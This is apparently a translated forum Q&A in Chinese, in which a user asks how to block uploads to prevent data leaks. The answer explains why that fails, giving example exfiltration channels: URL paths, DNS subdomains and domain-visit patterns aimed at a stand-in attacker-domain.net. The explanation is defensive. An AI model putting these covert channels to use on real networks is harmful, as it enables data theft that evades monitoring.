我希望我的网络是安全的,因此不允许上传、通过邮件附加或其他泄露行为。
我尝试了 Windows 防火墙出站规则。但它确实强制关闭了所有连接。对我来说不起作用。
请指导我,是否有任何插件/附加组件可以阻止浏览器文件上传/协议或 Windows 漏洞来拒绝文件上传。
谢谢你对我的问题感兴趣。
答案1
那么,您想阻止网络内部的信息被传输到网络外部(即互联网)吗?
如果 PC 可以从您的网络内访问互联网(例如,如果它可以浏览网页),那么防止信息泄露到互联网几乎是不可能的。
让我给你举一些数据如何泄露的例子:
电子邮件和上传
这就是你要防止的事情。也许可以防止这种情况发生,但没用,因为还有许多其他方法。
URL 编码泄漏
攻击者可以使用任何浏览器以如下形式访问 URL:
http://attacker-domain.net/leak-some-data/DATA-THAT-SHOULD-BE-LEAKED
他只需要一个配置为保存所有请求的特殊服务器。
DNS 编码泄漏
攻击者可以使用 DNS 泄露信息。通过使用您计算机上任何可以访问互联网的程序。只需让程序尝试联系以下地址即可:
应该泄露的数据.attacker-domain.net
这将导致您的 PC 向 DNS 服务器发出 DNS 请求。然后,该请求被转发到 的 DNS 服务器attacker-domain.net。因此,攻击者只需要一个经过修改的 DNS 服务器来记录收到的请求。
在请求模式中编码数据
攻击者需要多个域/地址。为了泄露信息,攻击者可以使用这些域的访问模式。例如,为了泄露单词“hello”,攻击者可以使用一个简单的浏览器并按特定顺序访问他控制的域:
h-attacker-domain.net
e-attacker-domain.net
l-attacker-domain.net
l-attacker-domain.net
o-attacker-domain.net
显然,也可以使用二进制代码,或者使用多个含义相同的域,等等。
结论
这只是攻击者用来向外界传输信息的众多方法中的一部分。显然,攻击者可以结合使用其中一些方法,并使用加密和/或混淆技术来增加检测难度。
因此,阻止通过浏览器上传几乎是无用的。